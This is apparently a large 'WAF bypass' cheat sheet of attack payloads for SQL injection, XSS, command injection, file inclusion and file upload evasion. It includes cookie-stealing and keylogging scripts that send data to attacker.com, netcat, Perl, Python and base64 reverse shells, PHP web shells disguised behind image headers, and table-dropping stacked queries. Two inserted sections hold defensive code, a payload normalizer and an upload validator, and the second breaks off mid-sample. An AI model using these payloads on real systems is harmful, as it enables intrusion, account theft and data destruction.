🛡️ WAF BYPASS ULTIMATE ARCHIVE – 500+ PAYLOADS, 50+ TECHNIQUES

📌 CONTENTS

  1. SQL Injection WAF Bypass (150+ payload)
  2. XSS WAF Bypass (100+ payload)
  3. Command Injection WAF Bypass (80+ payload)
  4. LFI/RFI WAF Bypass (70+ payload)
  5. File Upload WAF Bypass (60+ payload)
  6. SSRF WAF Bypass (40+ payload)
  7. XXE WAF Bypass (30+ payload)
  8. LDAP Injection WAF Bypass (20+ payload)

1. SQL INJECTION WAF BYPASS (150+)

1.1. Case Variation (Upper/Lower Case)

```sql
UnIoN SeLeCt 1,2,3
UnIoN aLl SeLeCt 1,2,3
uNiOn sElEcT 1,2,3
UNION SELECT 1,2,3
Union Select 1,2,3
uNION sELECT 1,2,3
```

1.2. URL Encoding (Single Layer)

```sql
%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31
%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2d%2d
%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2d%2d
```

1.3. Double URL Encoding

```sql
%2527%2520%2555%254e%2549%254f%254e%2520%2553%2545%254c%2545%2543%2554%2520%2531
%2527%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2533%252d%252d
%2527%2520%252f%252a%252a%252f%2575%256e%2569%256f%256e%252f%252a%252a%252f%2573%2565%256c%2565%2563%2574%252f%252a%252a%252f%2531
```

1.4. Triple URL Encoding

```sql
%252527%252520%252555%25254e%252549%25254f%25254e%252520%252553%252545%25254c%252545%252543%252554%252520%252531
```

1.5. Unicode Encoding

```sql
%u0027%u0020%u0055%u004e%u0049%u004f%u004e%u0020%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0031
%uff07%uff20%uff35%uff2e%uff29%uff2f%uff2e%uff20%uff33%uff25%uff2c%uff25%uff23%uff34%uff20%uff11
```

1.6. Hex Encoding

```sql
0x756e696f6e2073656c6563742031
0x273d2731
0x27206f72202731273d2731
0x27206f7220313d312d2d
0x27206f7220313d312023
0x2720616e6420313d312d2d
0x2720616e6420313d312023
```

1.7. Binary Encoding

```sql
0b111010101101110011010010110111101101110001000000111001101100101011011000110010101100011011101000010000000110001
```

1.8. Octal Encoding

```sql
\125\116\111\117\116\040\123\105\114\105\103\124\040\61
```

1.9. Comment Bypass (Multiple)

```sql
/**/union/**/select/**/1,2,3
/*!union*//*!select*/1,2,3
/*!50000union*//*!50000select*/1,2,3
/*!uNiOn*//*!sElEcT*/1,2,3
/******/union/******/select/******/1,2,3
/*!12345union*//*!12345select*/1,2,3
/*!0union*//*!0select*/1,2,3
```

1.10. Nested Comment

```sql
/*!union/*/*/*/select*/1,2,3
/*!union/*!select*/1,2,3*/
/*!union/*!select*/*/1,2,3
```

1.11. Space Bypass (Various)

```sql
union%0aselect%0a1,2,3
union%0dselect%0d1,2,3
union%09select%091,2,3
union%0bselect%0b1,2,3
union%0cselect%0c1,2,3
union%20select%201,2,3
union%a0select%a01,2,3
union%00select%001,2,3
union%0d%0aselect%0d%0a1,2,3
union%09%0d%0aselect%09%0d%0a1,2,3
```

1.12. Alternative Space Characters

```sql
union%80select%801,2,3
union%81select%811,2,3
union%82select%821,2,3
union%83select%831,2,3
union%84select%841,2,3
union%85select%851,2,3
union%86select%861,2,3
union%87select%871,2,3
union%88select%881,2,3
union%89select%891,2,3
union%8aselect%8a1,2,3
union%8bselect%8b1,2,3
union%8cselect%8c1,2,3
union%8dselect%8d1,2,3
union%8eselect%8e1,2,3
union%8fselect%8f1,2,3
union%90select%901,2,3
union%91select%911,2,3
union%92select%921,2,3
union%93select%931,2,3
union%94select%941,2,3
union%95select%951,2,3
union%96select%961,2,3
union%97select%971,2,3
union%98select%981,2,3
union%99select%991,2,3
union%9aselect%9a1,2,3
union%9bselect%9b1,2,3
union%9cselect%9c1,2,3
union%9dselect%9d1,2,3
union%9eselect%9e1,2,3
union%9fselect%9f1,2,3
```

1.13. Tab Bypass

```sql
union	select	1,2,3
```

1.14. Line Break Bypass

```sql
union%0Aselect%0A1,2,3
union%0Dselect%0D1,2,3
union%0A%0Dselect%0A%0D1,2,3
union%0D%0Aselect%0D%0A1,2,3
union%0A%0A%0Aselect%0A%0A%0A1,2,3
```

1.15. Null Byte Bypass

```sql
union%00select%001,2,3
%00'%00%20%00union%00%20%00select%00%20%001,2,3%00
```

1.16. Scientific Notation Bypass

```sql
1e0union select 1,2,3
1.0union select 1,2,3
1.union select 1,2,3
```

1.17. Parenthesis Bypass

```sql
(union)select 1,2,3
union(select 1,2,3)
union select(1,2,3)
(union)(select)(1,2,3)
```

1.18. Backticks Bypass (MySQL)

```sql
`union` `select` 1,2,3
union`select`1,2,3
`union`select 1,2,3
```

1.19. Quotes Bypass

```sql
''union select 1,2,3
""union select 1,2,3
``union select 1,2,3
```

1.20. Math Operations Bypass

```sql
1+1union select 1,2,3
2-1union select 1,2,3
2*1union select 1,2,3
2/1union select 1,2,3
```

1.21. Boolean Bypass (for WAF Evasion)

```sql
'||'1'||'='||'1
'%26%26'1'%3d'1
'%20%26%26%20'1'%3d'1
'%20%7c%7c%20'1'%3d'1
'%20%6f%72%20'1'%3d'1
'%20%6f%72%20%31%3d%31
'%20%61%6e%64%20%31%3d%31
'%20%61%6e%64%20%31%3d%32
'%20%6f%72%20%31%3d%32
```

1.22. Operator Bypass

```sql
' xor 1=1--
' xor 1=2--
' && 1=1--
' && 1=2--
' || 1=1--
' || 1=2--
' & 1=1--
' & 1=2--
' | 1=1--
' | 1=2--
' ^ 1=1--
' ^ 1=2--
' << 1=1--
' >> 1=1--
' ~ 1=1--
```

1.23. Time Based WAF Bypass

```sql
'%20%26%26%20sleep(5)%3d'1
'%20%7c%7c%20sleep(5)%3d'1
'%20%6f%72%20sleep(5)%3d'1
'%20%61%6e%64%20sleep(5)%3d'1
'%20%26%26%20BENCHMARK(10000000,MD5(1))%3d'1
'%20%7c%7c%20BENCHMARK(10000000,MD5(1))%3d'1
'%20%6f%72%20BENCHMARK(10000000,MD5(1))%3d'1
'%20%61%6e%64%20BENCHMARK(10000000,MD5(1))%3d'1
```

1.24. Error Based WAF Bypass

```sql
'%20%26%26%20extractvalue(1,concat(0x7e,database()))%3d'1
'%20%7c%7c%20extractvalue(1,concat(0x7e,database()))%3d'1
'%20%6f%72%20extractvalue(1,concat(0x7e,database()))%3d'1
'%20%61%6e%64%20extractvalue(1,concat(0x7e,database()))%3d'1
'%20%26%26%20updatexml(1,concat(0x7e,database()),1)%3d'1
'%20%7c%7c%20updatexml(1,concat(0x7e,database()),1)%3d'1
'%20%6f%72%20updatexml(1,concat(0x7e,database()),1)%3d'1
'%20%61%6e%64%20updatexml(1,concat(0x7e,database()),1)%3d'1
```

1.25. Stacked Queries WAF Bypass

```sql
';%20DROP%20TABLE%20users;--
';%20INSERT%20INTO%20admin%20VALUES('hacker','pass');--
';%20UPDATE%20users%20SET%20password='hacked'%20WHERE%20username='admin';--
';%20SELECT%20*%20INTO%20OUTFILE%20'/var/www/shell.php'%20FROM%20(SELECT%20'%3C?php%20system($_GET[%22c%22]);%20?%3E')a;--
';%20EXEC%20xp_cmdshell('id');--
';%20EXEC%20master..xp_cmdshell('id');--
';%20EXEC%20xp_regread('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','ProgramFilesDir');--
```

1.26. Order By Bypass

```sql
'/**/order/**/by/**/1--
'/**/order/**/by/**/2--
'/**/order/**/by/**/3--
'%20order%20by%201--
'%20order%20by%202--
'%20order%20by%203--
'%20order%20by%201%2c2%2c3--
```

1.27. Information Schema Bypass

```sql
union select 1,2,table_name from/*/*/information_schema.tables
union select 1,2,column_name from/*/*/information_schema.columns where table_name='users'
union select 1,2,schema_name from/*/*/information_schema.schemata
```

1.28. Database Function Bypass

```sql
database() -> db_name()
version() -> @@version
user() -> current_user()
user() -> system_user()
user() -> session_user()
@@datadir -> @@datadir
@@hostname -> @@hostname
```

1.29. WAF Logic Bypass

```sql
1'/*!00000or*/1=1-- -
1'/*!00000or*/1=1#
1'/*!00000and*/1=1-- -
1'/*!00000and*/1=2-- -
1'/*!00000or*/1=2-- -
1'/*!00000xor*/1=1-- -
```

1.30. HTTP Parameter Pollution (HPP)

```sql
id=1&id=2
id=1&id=2' union select 1,2,3
id=1&id=1' union select 1,2,3
id=1&id=1' and 1=1
```

1.31. HTTP Parameter Fragmentation

```sql
id=1' uni//on sel//ect 1,2,3
id=1' un//ion se//lect 1,2,3
id=1' un/**/ion se/**/lect 1,2,3
```
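
The encoding, comment and whitespace variants in 1.2 to 1.16 all collapse to the same few tokens once they are decoded, which is why a WAF rule or a log-analysis check has to canonicalize a value before it matches signatures, and why a single-pass decoder is the weakness these lists probe. The normalizer below is an added example written for this page from the defender's side; it is not code from the archive's author. It percent-decodes repeatedly (including the non-standard `%uXXXX` form of 1.5) until the text stops changing, folds fullwidth characters with NFKC, keeps the body of MySQL `/*!NNNNN ... */` versioned comments from 1.9, drops ordinary comments, decodes `0x..` hex literals from 1.6 and maps control bytes, DEL, the C1 range and NBSP (1.11, 1.12, 1.15) to one space before testing for `UNION [ALL] SELECT`. The function names, the layer cap and the sample list are my own; the sample payloads are taken from the sections above.

```python
import re
import unicodedata
from urllib.parse import unquote

MAX_DECODE_LAYERS = 5   # cap so a request cannot force unbounded decoding work


def _decode_percent_u(s: str) -> str:
    """Decode the non-standard %uXXXX form (section 1.5) that unquote() ignores."""
    return re.sub(r"%[uU]([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1), 16)), s)


def decode_layers(s: str, max_layers: int = MAX_DECODE_LAYERS):
    """Percent-decode until the text stops changing; return (text, layers removed).

    latin-1 keeps every %XX byte as one character, so %a0 or %85 survive
    instead of turning into U+FFFD.
    """
    layers = 0
    for _ in range(max_layers):
        nxt = unquote(_decode_percent_u(s), encoding="latin-1")
        if nxt == s:
            break
        s, layers = nxt, layers + 1
    return s, layers


def normalize_sql(s: str) -> str:
    """Canonical lower-case form of a parameter value for signature matching."""
    s, _ = decode_layers(s)
    s = unicodedata.normalize("NFKC", s)           # fullwidth letters -> ASCII
    # MySQL executes the body of /*!NNNNN ... */ (section 1.9): keep the body
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", s, flags=re.S)
    # ordinary /* ... */ comments only separate tokens
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # MySQL hex literals (section 1.6) compare equal to the decoded string
    s = re.sub(r"0x((?:[0-9a-fA-F]{2})+)\b",
               lambda m: bytes.fromhex(m.group(1)).decode("latin-1"), s)
    # control bytes, DEL, the C1 range and NBSP (1.11, 1.12, 1.15) are separators
    s = re.sub(r"[\x00-\x20\x7f-\xa0]+", " ", s)
    return s.strip().lower()


# No leading \b: "1e0union" (section 1.16) glues the keyword to a number.
UNION_SELECT = re.compile(r"union(?:\W+all)?\W+select\b")


def looks_like_union_select(raw_value: str) -> bool:
    """True when the canonical form carries a UNION [ALL] SELECT."""
    return UNION_SELECT.search(normalize_sql(raw_value)) is not None


# Constructed sample: payloads from sections 1.1-1.16 plus two benign values.
SAMPLES = [
    "UnIoN SeLeCt 1,2,3",
    "%2527%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531",
    "%u0027%u0020%u0055%u004e%u0049%u004f%u004e%u0020%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0031",
    "0x756e696f6e2073656c6563742031",
    "/*!50000union*//*!50000select*/1,2,3",
    "union%a0select%a01,2,3",
    "1e0union select 1,2,3",
    "SELECT name FROM users WHERE id = 1",
    "the union of selected records",
]


def classify(values):
    """Map each raw value to (canonical form, flagged?)."""
    return {v: (normalize_sql(v), looks_like_union_select(v)) for v in values}


if __name__ == "__main__":
    for raw, (canon, hit) in classify(SAMPLES).items():
        print(f"{'HIT ' if hit else 'ok  '} {raw[:40]:40} -> {canon}")
```

The decoder deliberately strips more layers than the backend would, so a value such as `%2527` is judged by what it could become rather than by what the application will see; for a detection rule that bias toward false positives is the right one, while an application-side sanitizer should instead decode exactly as many times as its own stack does and reject anything that still contains `%`.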

2. XSS WAF BYPASS (100+)

2.1. Case Variation

```html
<ScRiPt>alert(1)</sCrIpT>
<ImG sRc=x OnErRoR=alert(1)>
<SvG oNlOaD=alert(1)>
<bOdY oNlOaD=alert(1)>
<iNpUt oNfOcUs=alert(1) aUtOfOcUs>
```

2.2. Double Case (Mixed)

```html
<ScRiPt>AlErT(1)</ScRiPt>
<ImG sRc=x OnErRoR=AlErT(1)>
<SvG oNlOaD=AlErT(1)>
```

2.3. URL Encoding (Single)

```html
%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src=x%20onerror=alert(1)%3E
%3Csvg%20onload=alert(1)%3E
```

2.4. Double URL Encoding

```html
%253Cscript%253Ealert(1)%253C/script%253E
%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
%253Csvg%2520onload%253Dalert(1)%253E
```

2.5. Hex Encoding (HTML)

```html
&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;
&#x3C;&#x69;&#x6D;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x78;&#x20;&#x6F;&#x6E;&#x65;&#x72;&#x72;&#x6F;&#x72;&#x3D;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3E;
```

2.6. Decimal Encoding (HTML)

```html
&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;
&#60;&#105;&#109;&#103;&#32;&#115;&#114;&#99;&#61;&#120;&#32;&#111;&#110;&#101;&#114;&#114;&#111;&#114;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;
```

2.7. Mixed Encoding (HTML+URL)

```html
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
%3Cscript&#x3E;alert(1)%3C/script&#x3E;
```

2.8. Unicode Encoding (JS)

```html
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<img src=x onerror=\u0061\u006c\u0065\u0072\u0074(1)>
<svg onload=\u0061\u006c\u0065\u0072\u0074(1)>
```

2.9. Hexadecimal JS Encoding

```html
<script>\x61\x6c\x65\x72\x74(1)</script>
<img src=x onerror=\x61\x6c\x65\x72\x74(1)>
<svg onload=\x61\x6c\x65\x72\x74(1)>
```

2.10. Octal JS Encoding

```html
<script>\141\154\145\162\164(1)</script>
<img src=x onerror=\141\154\145\162\164(1)>
```

2.11. Event Handler Bypass (Multiple)

```html
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<iframe onload=alert(1)>
<embed onload=alert(1)>
<link onload=alert(1)>
<video onloadstart=alert(1)>
<audio onloadstart=alert(1)>
<marquee onstart=alert(1)>
<details ontoggle=alert(1)>
<meter onmouseover=alert(1)>
<progress onmouseover=alert(1)>
<object onerror=alert(1)>
```

2.12. Space Bypass (Event Handler)

```html
<img/src=x/onerror=alert(1)>
<img%0Asrc=x%0Aonerror=alert(1)>
<img%09src=x%09onerror=alert(1)>
<img%0dsrc=x%0donerror=alert(1)>
<img%0asrc=x%0a%0aonerror=alert(1)>
```

2.13. Quote Bypass

```html
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
```

2.14. Parenthesis Bypass

```html
<img src=x onerror=alert`1`>
<img src=x onerror=alert(1)>
```

2.15. New Line Bypass

```html
<img%0Asrc=x%0Aonerror=alert(1)>
<svg%0Aonload=alert(1)>
<body%0Aonload=alert(1)>
```

2.16. Tab Bypass

```html
<img	src=x	onerror=alert(1)>
<svg	onload=alert(1)>
<body	onload=alert(1)>
```

2.17. Null Byte Bypass

```html
<%00script%00>alert(1)<%00/script%00>
<%00img%00src=x%00onerror=alert(1)%00>
```

2.18. Filter Evasion (String Concatenation)

```html
<script>al('er' + 't')(1)</script>
<script>al('er','t')(1)</script>
<script>al('er'/'t')(1)</script>
<script>al('er'.concat('t'))(1)</script>
```

2.19. Filter Evasion (Window Object)

```html
<script>window['alert'](1)</script>
<script>window['al' + 'ert'](1)</script>
<script>window['a'+'l'+'e'+'r'+'t'](1)</script>
```

2.20. Filter Evasion (Self)

```html
<script>self['alert'](1)</script>
<script>self['al' + 'ert'](1)</script>
```

2.21. Filter Evasion (This)

```html
<script>this['alert'](1)</script>
<script>this['al' + 'ert'](1)</script>
```

2.22. Filter Evasion (Top)

```html
<script>top['alert'](1)</script>
<script>parent['alert'](1)</script>
<script>frames['alert'](1)</script>
```

2.23. Filter Evasion (Function)

```html
<script>Function('alert(1)')()</script>
<script>['alert'].map(e=>eval(e+'(1)'))()</script>
<script>[].map.call`${'alert'}${'(1)'}`</script>
```

2.24. Filter Evasion (Eval)

```html
<script>eval('alert(1)')</script>
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
```

2.25. Cookie Stealer Payload

```html
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>
<img src=x onerror="fetch('http://attacker.com/steal?c='+document.cookie)">
<svg onload="fetch('http://attacker.com/steal?c='+document.cookie)">
<script>new Image().src='http://attacker.com/steal?c='+document.cookie</script>
```

2.26. Keylogger Payload

```html
<script>
document.onkeypress = function(e) {
fetch('http://attacker.com/keylog?k=' + e.key);
}
</script>
```

3. COMMAND INJECTION WAF BYPASS (80+)

3.1. New Line Bypass

```bash
%0aid%0a
%0aid%0a%0a
%0Aid%0A
%0Aid%0A%0A
%0aid%0a%23
%0Aid%0A%23
```

3.2. Carriage Return Bypass

```bash
%0did%0d
%0did%0d%0d
%0Did%0D
```

3.3. Line Feed + Carriage Return

```bash
%0a%0did%0a%0d
%0a%0did%0a%0d%23
```

3.4. Tab Bypass

```bash
%09id%09
%09id%09%09
%09id%09%23
```

3.5. Vertical Tab Bypass

```bash
%0bid%0b
%0bid%0b%0b
%0bid%0b%23
```

3.6. Form Feed Bypass

```bash
%0cid%0c
%0cid%0c%0c
%0cid%0c%23
```

3.7. Space Bypass (IFS)

```bash
;${IFS}id
;${IFS}id${IFS}
;${IFS}id${IFS}|${IFS}nc${IFS}10.0.0.1${IFS}8080
;${IFS}id${IFS}&&${IFS}nc${IFS}10.0.0.1${IFS}8080${IFS}-e${IFS}/bin/sh
```

3.8. IFS Variable Bypass

```bash
;${IFS}id
;${IFS}id${IFS}
;${IFS}id${IFS};${IFS}nc${IFS}10.0.0.1${IFS}8080${IFS}-e${IFS}/bin/sh
;${IFS}id${IFS}|${IFS}nc${IFS}10.0.0.1${IFS}8080${IFS}-e${IFS}/bin/sh
```

3.9. Comment Bypass

```bash
;id#%0a
;id/*%0a*/
;id/*%0a*/|/*%0a*/nc/*%0a*/10.0.0.1/*%0a*/8080/*%0a*/-e/*%0a*/bin/sh
```

3.10. URL Encoding (Special Chars)

```bash
%3bid%0a
%7cid%0a
%26id%0a
%26%26id%0a
%7c%7cid%0a
```

3.11. Double URL Encoding

```bash
%253bid%250a
%253bid%250a%2523
%253Bid%250A%2523
```

3.12. Hex Encoding

```bash
\x3bid\x0a
\x7cid\x0a
\x26id\x0a
\x3b\x69\x64\x0a
```

3.13. Octal Encoding

```bash
\073id\012
\073\151\144\012
```

3.14. Wildcard Bypass

```bash
/?in/?/whoami
/?in/?/nc 10.0.0.1 8080 -e /?in/?/sh
/???/nc 10.0.0.1 8080 -e /???/sh
```

3.15. Environment Variable Bypass

```bash
${PATH:0:1}id
${PATH:0:1}usr${PATH:0:1}bin${PATH:0:1}id
${PATH:0:1}bin${PATH:0:1}sh
```

3.16. Substring Bypass

```bash
${PATH:0:1}bin${PATH:0:1}sh
${PATH:0:1}usr${PATH:0:1}bin${PATH:0:1}nc
```

3.17. Command Substitution Bypass

```bash
`id`
$(id)
`{id}`
$({id})
```

3.18. Reverse Shell Base64 Bypass

```bash
echo "bmMgMTI3LjAuMC4xIDQ0NDQgLWUgL2Jpbi9zaAo=" | base64 -d | bash
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS84MDgwIDA+JjE=" | base64 -d | bash
```

3.19. Perl Reverse Shell

```bash
perl -e 'use Socket;$i="10.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

3.20. Python Reverse Shell

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

4. LFI/RFI WAF BYPASS (70+)

4.1. Path Traversal (Basic)

```text
../../../../etc/passwd
....//....//....//etc/passwd
..\..\..\..\windows\win.ini
....\\....\\....\\windows\\win.ini
```

4.2. URL Encoding (Single)

```text
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
```

4.3. Double URL Encoding

```text
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
```

4.4. Triple URL Encoding

```text
%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd
```

4.5. Unicode Encoding

```text
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%e0%40%ae%e0%40%ae%e0%40%af%e0%40%ae%e0%40%ae%e0%40%af%e0%40%ae%e0%40%ae%e0%40%afetc%e0%40%afpasswd
```

4.6. UTF-8 Overflow

```text
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
```

4.7. Null Byte Bypass

```text
../../../../etc/passwd%00
../../../../etc/passwd%00.jpg
../../../../windows/win.ini%00
../../../../windows/win.ini%00.txt
```

4.8. Double Null Byte

```text
../../../../etc/passwd%00%00
../../../../etc/passwd%00%00.jpg
```

4.9. PHP Wrapper Bypass

```text
php://filter/convert.base64-encode/resource=../../../../etc/passwd
php://filter/read=convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../../../../etc/passwd%00
php://filter/string.tolower/resource=config.php
php://filter/string.rot13/resource=config.php
php://filter/zlib.deflate/resource=config.php
php://filter/zlib.inflate/resource=config.php
```

4.10. Data Wrapper Bypass

```text
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=
data://text/plain,<?php system($_GET['c']); ?>
```

4.11. Expect Wrapper Bypass

```text
expect://id
expect://ls
expect://whoami
```

4.12. Input Wrapper Bypass

```text
php://input
php://input%00
```

4.13. Zip Wrapper Bypass

```text
zip://shell.jpg%23shell.php
zip://../../../../var/www/html/shell.jpg%23shell.php
```

4.14. Phar Wrapper Bypass

```text
phar://shell.phar/shell.php
phar://../../../../var/www/html/shell.phar/shell.php
```

4.15. RFI Bypass (Remote)

4.16. SMB RFI Bypass

```text
\\attacker.com\share\shell.php
//attacker.com/share/shell.php
smb://attacker.com/share/shell.php
```

4.17. FTP RFI Bypass

```text
ftp://attacker.com/shell.php
ftps://attacker.com/shell.php
```

4.18. Data RFI Bypass

```text
http://attacker.com/data:<?php system($_GET['c']); ?>
https://attacker.com/data:<?php system($_GET['c']); ?>
```

4.19. Shortcut Bypass (Windows)

```text
....\....\....\windows\win.ini
..../..../..../windows/win.ini
```

4.20. Encoded Path Bypass

```text
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%5c%2e%2e%5c%2e%2e%5c%77%69%6e%64%6f%77%73%5c%77%69%6e%2e%69%6e%69
```

5. FILE UPLOAD WAF BYPASS (60+)

5.1. Double Extension

```text
shell.php.jpg
shell.php.jpeg
shell.php.png
shell.php.gif
shell.php;.jpg
shell.php;.jpeg
shell.php;.png
shell.php;.gif
shell.php%00.jpg
shell.php%00.jpeg
shell.php%00.png
shell.php%00.gif
shell.php.xyz.jpg
shell.php.txt.jpg
```

5.2. Case Variation

```text
shell.PHP.jpg
shell.PhP.jpg
shell.PHP.jpeg
shell.PhP.jpeg
shell.PHP.png
shell.PhP.png
```

5.3. Reverse Double Extension

```text
shell.jpg.php
shell.jpg.php5
shell.jpg.phtml
shell.jpg.phar
shell.jpg.php3
shell.jpg.php4
shell.jpg.php7
```

5.4. Content-Type Bypass

```text
Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
Content-Type: image/bmp
Content-Type: image/webp
Content-Type: image/svg+xml
```

5.5. Magic Bytes Bypass (JPEG)

```text
ÿØÿà JFIF
ÿØÿá Exif
ÿØÿâ
ÿØÿã
ÿØÿä
ÿØÿå
```

5.6. Magic Bytes Bypass (PNG)

```text
%PNG
‰PNG
```

5.7. Magic Bytes Bypass (GIF)

```text
GIF89a;
GIF87a;
```

5.8. Magic Bytes Bypass (BMP)

```text
BM
```

5.9. Magic Bytes Bypass (TIFF)

```text
II*
MM*
```

5.10. Magic Bytes + PHP Code

```php
GIF89a;
<?php system($_GET['c']); ?>
```

```php
%PNG
<?php system($_GET['c']); ?>
```

```php
ÿØÿà JFIF
<?php system($_GET['c']); ?>
```

5.11. Multi Magic Bytes

```php
GIF89a;%PNGÿØÿà JFIF
<?php system($_GET['c']); ?>
```

5.12. .htaccess Bypass

```apache
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .png
AddType application/x-httpd-php .gif
AddHandler application/x-httpd-php .jpg
```

5.13. .user.ini Bypass

```ini
auto_prepend_file = shell.jpg
auto_append_file = shell.jpg
```

5.14. Filename Null Byte (Old Systems)

```text
shell.php\0.jpg
shell.php%00.jpg
shell.php%00.jpeg
```

5.15. Chunked Upload Bypass

```http
POST /upload.php HTTP/1.1
Transfer-Encoding: chunked

9
shell.php
0
```

5.16. Large Payload Padding

```text
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (20KB) ...<?php system($_GET['c']); ?>
```

5.17. MIME Type + Extension Mismatch

```text
Content-Type: image/jpeg
shell.php.jpg
```

5.18. Filename without Extension

```text
shell
shell.
shell.php.
```

5.19. Unicode Filename

```text
%73%68%65%6c%6c%2e%70%68%70%2e%6a%70%67
shell%u002ephp%u002ejpg
```

5.20. Space in Filename

```text
shell .php.jpg
shell .php .jpg
shell. php.jpg
```
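
Every trick in 5.1 to 5.20 targets one check taken in isolation: a last-extension test, a Content-Type test, or a magic-bytes test. The validator below is an added example written for this page from the defender's side, not code from the archive's author; it applies all of the checks together and treats a correct image header as necessary but not sufficient, because the files in 5.10 and 5.11 pass any header sniff. It assumes the filename has already been taken out of the multipart body without any percent-decoding (so `%00` in a name is simply an illegal character) and that the caller stores the file under the random name the function returns, outside any directory the web server executes scripts from. Names, the allowlist and the sample calls are my own.

```python
import re
import secrets

# Extension -> (declared Content-Type we accept, leading magic bytes).
IMAGE_TYPES = {
    "jpg":  ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "png":  ("image/png",  b"\x89PNG\r\n\x1a\n"),
    "gif":  ("image/gif",  b"GIF8"),
}
# Anything the web server or PHP might interpret, wherever it appears in the name.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
               "htaccess", "ini"}
PHP_OPEN_TAGS = (b"<?php", b"<?=")


def validate_upload(filename: str, content_type: str, data: bytes):
    """Return (accepted, reason) or (accepted, stored_name) for an upload."""
    # 1. Name hygiene: no control bytes (5.14), no ';' or '%' (5.1, 5.19),
    #    no spaces (5.20). One regex covers all of them.
    if not re.fullmatch(r"[A-Za-z0-9._-]+", filename):
        return False, "filename contains characters outside [A-Za-z0-9._-]"
    parts = filename.lower().split(".")
    # 2. Dotfiles (.htaccess 5.12, .user.ini 5.13), missing or empty
    #    extensions and trailing dots (5.18).
    if len(parts) < 2 or any(p == "" for p in parts):
        return False, "dotfile, empty extension or trailing dot"
    # 3. A script extension anywhere after the base name (5.1-5.3, 5.17),
    #    compared case-insensitively (5.2).
    if any(p in SCRIPT_EXTS for p in parts[1:]):
        return False, "script extension present in name"
    ext = parts[-1]
    if ext not in IMAGE_TYPES:
        return False, f"extension {ext!r} not in allowlist"
    expected_type, magic = IMAGE_TYPES[ext]
    # 4. The declared type must agree with the extension (5.4, 5.17).
    if content_type.split(";")[0].strip().lower() != expected_type:
        return False, "Content-Type does not match extension"
    # 5. Magic bytes must match, but a header proves nothing on its own
    #    (5.10, 5.11), so also refuse anything carrying a PHP open tag.
    if not data.startswith(magic):
        return False, "file header does not match extension"
    if any(tag in data for tag in PHP_OPEN_TAGS):
        return False, "PHP open tag inside image data"
    # 6. Never store under the user-chosen name: random name, validated ext.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample uploads built from the names in sections 5.1-5.20.
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
    for name, ctype, body in [
        ("shell.php.jpg", "image/jpeg", jpeg),
        ("shell.jpg.phtml", "image/jpeg", jpeg),
        (".htaccess", "text/plain", b"AddType application/x-httpd-php .jpg"),
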